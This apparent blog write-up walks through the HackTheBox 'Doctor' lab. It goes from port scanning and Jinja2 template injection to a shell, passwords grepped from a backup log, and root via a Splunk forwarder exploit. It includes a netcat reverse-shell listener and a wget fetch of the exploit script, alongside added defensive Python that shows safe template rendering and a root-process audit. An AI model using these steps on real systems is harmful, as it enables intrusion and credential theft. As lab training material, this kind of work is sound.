Introduction

Doctor is an easy-level machine released on 26 September 2020 on HackTheBox, created by egotisticalSW.

The blog is for educational purposes only.

Enumeration

IP: 10.10.10.209

As always, I added the IP to my hosts file.

Let's start with port scanning.

Nmap

softwareuser@parrot:~ sudo nmap -sC -sS -sV -T4 -A -oN nmap/intial_scan doctor.htb

-sC runs the default NSE scripts
-sV enables service version detection
-sS performs a TCP SYN scan
-T4 uses a faster timing template to speed up the scan
-A is aggressive mode (OS detection, version detection, script scanning and traceroute)
-oN writes normal output to the given file

lnmap is just my alias to print only the open ports from the result file.

Web Page

A simple web page; the links aren't working,

but we got a subdomain.

Let's add this domain to our hosts file (/etc/hosts):

Send us a message info@doctors.htb

doctors.htb

A login and register page.

Let's register.

Let's log in with the email and password that we used to register.

Nothing, it's blank. Let's look at the source code; I found something linked to /archive:

<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->

Let's check /archive.

/archive is also a blank page,

but on the web page we can see a New Message option.

Let's try to post a message containing an `<h1>` tag,

and we get the response "your post has been created".

We can check it on /archive.

As we can see, our message is there. At this point I was sure that I had to work a bit more and that I could execute a command or payload at /archive. Let's try some other tags too.

Let's post this message:

</title></item><h1>software</h1> </title></item><h1>user</h1>

It worked.

Source code:

It's vulnerable to SSTI (Server-Side Template Injection). Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Read more about SSTI.

We have to identify which template engine the web page is using; a picture from this article explains it easily.

So I started trying every payload to find out which template engine the web app is using, and finally I found that it's Jinja2, with the payload `{{5*'5'}}` (for more about it, check the Jinja2 docs). Let's try another payload to confirm that it's Jinja2, hehe.

Let's check /archive again.

That's working. Now I have to exploit the SSTI by calling Popen without guessing the offset.
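To make the root cause concrete, here is an added example (my own code, not the write-up's or the Doctor application's) of the two ways a Flask/Jinja2 app can build an item feed like /archive: the vulnerable way, which concatenates the user's title into the template source, and the safe way, which passes it as data. It also includes a small defensive helper that flags template delimiters in user input for logging or alerting, and it uses the `{{5*'5'}}` probe from the text to show the difference. It assumes Jinja2 is installed (it ships with Flask); all function names are mine.

```python
# Added example, not code from the original write-up or from the Doctor
# machine: vulnerable vs. safe Jinja2 rendering, plus the engine probe used
# in the text. Assumes Jinja2 is installed. All names here are my own.
from jinja2 import Environment

# Probe from the write-up: Jinja2 evaluates 5*'5' to "55555", whereas an
# engine that does not evaluate {{ }} echoes the string back unchanged.
PROBE = "{{5*'5'}}"


def render_vulnerable(title: str) -> str:
    """BAD: the user-controlled title is concatenated into the template
    *source*, so any template syntax in it is evaluated server-side.
    This is the pattern that makes an SSTI like the one above possible."""
    env = Environment(autoescape=True)
    template = env.from_string("<item><title>" + title + "</title></item>")
    return template.render()


def render_safe(title: str) -> str:
    """GOOD: the template source is a fixed string and the title is passed
    as data. Jinja2 prints it as text and, with autoescape on, HTML-escapes
    it, so neither {{ }} nor an <h1> tag has any effect."""
    env = Environment(autoescape=True)
    template = env.from_string("<item><title>{{ title }}</title></item>")
    return template.render(title=title)


# Delimiters of common server-side template engines (Jinja2/Twig, ERB, EL).
TEMPLATE_MARKERS = ("{{", "}}", "{%", "%}", "${", "#{", "<%")


def looks_like_template_probe(value: str) -> bool:
    """Defensive helper for request logging / alerting: flags user input that
    carries template delimiters. A detection aid only; the fix is render_safe()."""
    return any(marker in value for marker in TEMPLATE_MARKERS)


if __name__ == "__main__":
    for payload in (PROBE, "<h1>software</h1>"):
        print("input      :", payload)
        print("vulnerable :", render_vulnerable(payload))
        print("safe       :", render_safe(payload))
        print("alert      :", looks_like_template_probe(payload))
        print()
```

Running it shows `render_vulnerable(PROBE)` producing `55555` (the engine evaluated the expression) while `render_safe(PROBE)` prints the probe back as escaped text. The `<h1>` case shows the same split: the vulnerable path emits a live heading, the safe path emits `&lt;h1&gt;`. The defensive point is that reaching `Popen` is only the last step; the bug is the string concatenation in `render_vulnerable`, and the fix is to treat user content as a template variable, never as template source.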

Payload

Let's create a new message with the payload.

Let's post the message.

Now let's access /archive; we got a shell as web@doctor.

Web (Shell)

We don't have permission to read user.txt, so we have to enumerate more. After some time I found some log files, and there is a backup; I found creds in that file, probably of user shaun, because shaun owns our user.txt.

cat backup | grep -iE "password"

Got user.

Root Part

As always, I run linPEAS. After running linPEAS, I found that Splunk is running.

The Splunk forwarder is one of the components of Splunk infrastructure. It basically acts as an agent for log collection from remote machines: the forwarder collects logs from remote machines and forwards them to the indexer (the Splunk database) for further processing and storage. Read more about Splunk here.
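What turns a forwarder takeover into a root shell is the forwarder running as root. The following is an added audit helper (my own code, not from the write-up or from Splunk) that parses `ps -eo user,pid,comm` output and reports any Splunk process owned by root; it is demonstrated on a constructed sample, not on output captured from the machine. Names and the sample are mine.

```python
# Added example, not code from the original write-up or from Splunk: flag
# Splunk forwarder processes that run as root. Works on the output of
# `ps -eo user,pid,comm`; demonstrated here on a constructed sample.
import subprocess
from typing import Dict, List

# Constructed sample of `ps -eo user,pid,comm` (not captured from Doctor);
# the user names just mirror the ones in the write-up.
SAMPLE_PS = """\
USER       PID COMMAND
root         1 systemd
root       912 splunkd
splunk     913 splunkd
web       1402 python3
shaun     1550 bash
"""

# Process names that belong to a Splunk forwarder install.
SPLUNK_PROCESS_NAMES = {"splunkd"}


def parse_ps(text: str) -> List[Dict[str, str]]:
    """Turn `ps -eo user,pid,comm` output into rows, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)  # comm may itself contain spaces
        if len(parts) == 3:
            rows.append({"user": parts[0], "pid": parts[1], "comm": parts[2]})
    return rows


def splunk_processes_as_root(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rows whose command is a Splunk process and whose owner is root."""
    return [r for r in rows
            if r["comm"] in SPLUNK_PROCESS_NAMES and r["user"] == "root"]


def audit_forwarder(ps_text: str) -> List[str]:
    """Return one finding per root-owned Splunk process; empty list means OK."""
    findings = []
    for row in splunk_processes_as_root(parse_ps(ps_text)):
        findings.append(
            f"{row['comm']} pid {row['pid']} runs as root; run the forwarder "
            "as a dedicated low-privilege service user instead")
    return findings


def live_ps_output() -> str:
    """Collect real process data on the host being audited."""
    return subprocess.run(["ps", "-eo", "user,pid,comm"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Swap SAMPLE_PS for live_ps_output() to audit the current host.
    for line in audit_forwarder(SAMPLE_PS) or ["OK: no Splunk process runs as root"]:
        print(line)
```

On the constructed sample the audit reports pid 912 and stays silent for the pid 913 instance that runs under its own `splunk` account. The check is deliberately narrow: it answers only "does the forwarder carry root privileges?", which is the condition a defender can remove so that a compromised forwarder no longer yields root.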

After googling, I found a script which can be used here for privilege escalation: PySplunkWhisperer2.

PySplunkWhisperer2

We have to start a netcat listener and then run PySplunkWhisperer2 on our system.

nc -lnvp 5006 # your machine
python3 -m http.server 80 # your machine
wget http://10.10.xx.xxx:80/PySplunkWhisperer2_remote.py # your machine

Let's run the netcat listener.

Let's run PySplunkWhisperer2 to get a shell.

payload

We got a shell.

Now we can read root.txt.

Thank you for reading my blog. If you have any suggestions, feel free to contact me on Twitter.

Author

0xSoftware User